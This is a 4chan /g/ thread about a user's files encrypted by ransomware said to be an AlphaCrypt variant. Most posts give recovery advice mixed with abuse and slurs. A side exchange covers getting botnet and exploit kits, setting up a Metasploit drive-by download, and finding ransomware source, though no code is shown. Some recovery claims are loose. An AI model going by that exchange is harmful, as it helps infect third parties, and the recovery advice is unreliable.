It's the file that allows encryptions to exist and without it your files will be automatically decrypted.

>> No.47966281

I think only one in the three is silent the other two require user input, tbh they don't sell to just anyone so you'd need to make a name in some of the underground botnet places. It's not open source and costs a fair bit though.

>> No.47966306

call geeksquad. nothing dumber than some kid trying to act smart on /g/ by posting stupid steps and shit no one would ever think to try without having access to the computer

you are all fucking retards

>> No.47966316

>And smallpox is still a problem despite being eradicated entirely. Just like polio
well with anti-vaxxers now a days...

>> No.47966328

Except this is a typical crypto locker case and he is genuinely fucked if it's not one of reversed and fixed ones.

You're mighty fucking idiotic if you think the underpaid underqualified asshat at geeksquad can fix this.

>> No.47966330

Your still talking the good versions, Im looking for something that is old, not particularly usefull for anything other than for getting one or two installs.

I kinda want to just brush up on the whole topic, Im personally more interested in the coding behind everything than actually running a net.
Java isnt my thing I much prefer C/C++, all I was able to find in jdbs a while back was some outdated stuff that wont even run anymore.

>> No.47966366

here you go, most of them work like this.
This is outdated and most browsers will scream at you if they load it but the basics are there.

>> No.47966372

>call geeksquad
>pretending to be better than others when your first step is to whine to the useless idiots at geeksquad

>> No.47966373

Where could I find an open source cryptolocker/ransomware?

>> No.47966426
File: 3 KB, 560x88, back.png [View same] [iqdb] [saucenao] [google] [report]

Thanks for reminding me a backup was overdue.

And this is what you get for pirating games/software. Pay for it, like you're supposed to, and this won't happen.

Creators deserve money for the things they produce.

>> No.47966442
File: 31 KB, 240x160, 2215 - Fire Emblem - The Sacred Stones (E)(Rising Sun).st1.png [View same] [iqdb] [saucenao] [google] [report]

You deserved it, you fucking retard. DBAN that shit and install a real OS, like GNU/Linux ir FreeBSD.

>> No.47966456


>> No.47966473

You get what you deserve

>> No.47966499

Im about to sound like a scrub.. So this one actually requires metasplit be installed or is this using metastplit to generate the actual driveby that is hosted on the server?

>> No.47966513

>all these hurrudhurhdr use linux posts in the same thread
i'd ask if linux users get bored but then i remember they're using linux

>> No.47966515

Meh, most cryptolocker versions don't even spread though torrents tbh I would be more inclined to say that it's a driveby or fake software download site that got OP.

They are technically file encrypter and decrypter combos that get the key from a server instead of the user, the only hard part about them is making them small enough and fast enough to be spreadable efficiently.

>Linux doesn't have viruses
Sure there are less user targeted but there is infinitely more rootkits targeting linux servers than windows servers.

This one runs on the metasploit framework, you really should read up before attempting to set up a driveby if you are unfamiliar with metasploit.

>> No.47966545

I never said linux doesn't have viruses. OP deserves this because he's an unethical piece of shit

>> No.47966555
File: 845 KB, 300x300, 1410128289765.gif [View same] [iqdb] [saucenao] [google] [report]


>> No.47966568

At least you called it Linux as you should had called the Linux operating system.

>> No.47966583

Ill read up on it, Im under the impression its a tool that does the work for you kind of like, Icant even think of a good compairson, I guess like a printer vs a painter in making picture or like using cpanel instead of ssh, and not even knowing how to use ssh.

Thanks for the link

>> No.47966598

It builds and puts the exploit up but you can read the source for the driveby in the exploit source, you just need to understand how metasploit puts them together.

>> No.47966611


Pay for your software, dirty pirate.


Yeah I know, I'm just being antagonistic for fun.

>> No.47966613

got you

>> No.47966620

Hi there!

You seem to have made a bit of a mistake in your post. Luckily, the users of 4chan are always willing to help you clear this problem right up! You appear to have used a tripcode when posting, but your identity has nothing at all to do with the conversation! Whoops! You should always remember to stop using your tripcode when the thread it was used for is gone, unless another one is started! Posting with a tripcode when it isn't necessary is poor form. You should always try to post anonymously, unless your identity is absolutely vital to the post that you're making!

Now, there's no need to thank me - I'm just doing my bit to help you get used to the anonymous image-board culture!

>> No.47966664

Have you simply tried ignoring tripfags ?
Will I have to enable recursive filtering to truly get rid of the attention seeking fags ?

>> No.47966726

>Have you simply tried ignoring tripfags ?

He gets paid to do this.

>> No.47966732

How much ? I want in on the cash.

>> No.47966869

Use the secret NSA back door to decrypt it

>> No.47966935

Isn't there anything to increase this chance?

I'm pretty sure this guy is trolling, but just want anyone to confirm it

>> No.47966939

Good point.
There are servers that won't upgrade even for security purposes.
But most everyone, putting a monthly apt upgrade into cron keeps the malware away and they know it.
Even debian has a security line.

>> No.47967002

Sorry to break it to you but that one hasn't been broken yet and I assume you don't have a backup so it's safe to assume all your files are lost.
exx is an alphacrypt variant and unless you are willing to pay the ransom your files are dead.

>> No.47967022

although before you do try this, if the encryption method is the same you might still have some luck

>> No.47967033

If only we could wipe you and get a backup from before when you were a massive faggot.

Oh wait, such a thing doesn't exist.

>> No.47967052

how can I be sure after I pay the ransom I will get anything back, also I'm not into financing such low methods of money making, better tell me something, more for the alphacrypt, how do you know it is exactly alphacrypt what is best method/program to decrypt it? earlier a guy mentioned the key is in Windows Registry?

>> No.47967090

because the encryptor alphacrypt uses makes everything into .exx, and you can't be sure.
The key isn't in the registry, actually the key never even was in the registry, it was briefly in the memory of the malware while it encrypted the files and then it never needs it again.

Try the TeslaDecrypt thing I just sent if that fails you are out of options.

>> No.47967095

>hands shaking

isn't this a copypasta variation of the dude that finds his gf cheating in the other room?

>> No.47967097
File: 50 KB, 600x540, 1430081456050.jpg [View same] [iqdb] [saucenao] [google] [report]

>/g/ - Technology
>windows retards catching viruses

this board should die swiftly.

>> No.47967109

>Yotsuba on Yotsuba B
Eck my eyes

>> No.47967132

Well my best friend say I'm never out of option, but it seems you are right, is it safe to copy few photos on a USB flash and then install the TeslaDecrypt on another PC and try from there to uncrypt them, I mean the filex are only encrypted, not infected ...right?

>> No.47967189


>> No.47967222

Worst case scenario, take out hard drive, and wait a few years. Hopefully by then, someone has found a way to reverse encryption, or processing power has increased to a point where this stuff can be decrypted.

>> No.47967356

Thank you very much, this information seems handy.

This was my last measure, I never thought this encryption problem could be so serious, I figured since we can bring deleted files back we can do anything it's 2015 after all but it seems I have underestimated it ...alot...

>> No.47967367


>> No.47967506

Anytime man, when I had it happen to me I got a nice recovery program to do a deep scan on it, I had the infected drive slaved and all the recovered files were put onto the clean drive.
Cryptowall actually makes copies of the files, encrypts those and then deletes the unencrypted files. If you simply slave that drive on a clean computer you can recover the files, and then bomb the infected drive back to the stone age. I did a DOD standard wipe.

>> No.47967554

For friendly fellas like you, I still visit 4chan, the nice recovery program you got yourself was Cryptowall right?

>> No.47967708

No. Cryptowall is the virus. Use a program like Recuva, which recovers deleted files

>> No.47967768

But there is none deleted files, on my HDD only thousands of encrypted ones

>> No.47967853

>Cryptowall actually makes copies of the files, encrypts those and then deletes the unencrypted files.

I got what you were saying, so all of my files, have been deleted and replaced with encrypted ones with similar size, and now only thing I have to do is, get a decent recovery software

>> No.47968800

Thank you all, for trying next thing I will try the TeslaDecrypt and if nothing, ShadowExplorer and finally Recuve

>> No.47968965


that's what happens when you listen to /g/'s bullshit "hurr durr common sense" faggotry.

>> No.47969278

What are you talking about? Common Sense 2015 is just decent anti-virus software

Name (leave empty)
Comment (leave empty)
Password [?]Password used for file deletion.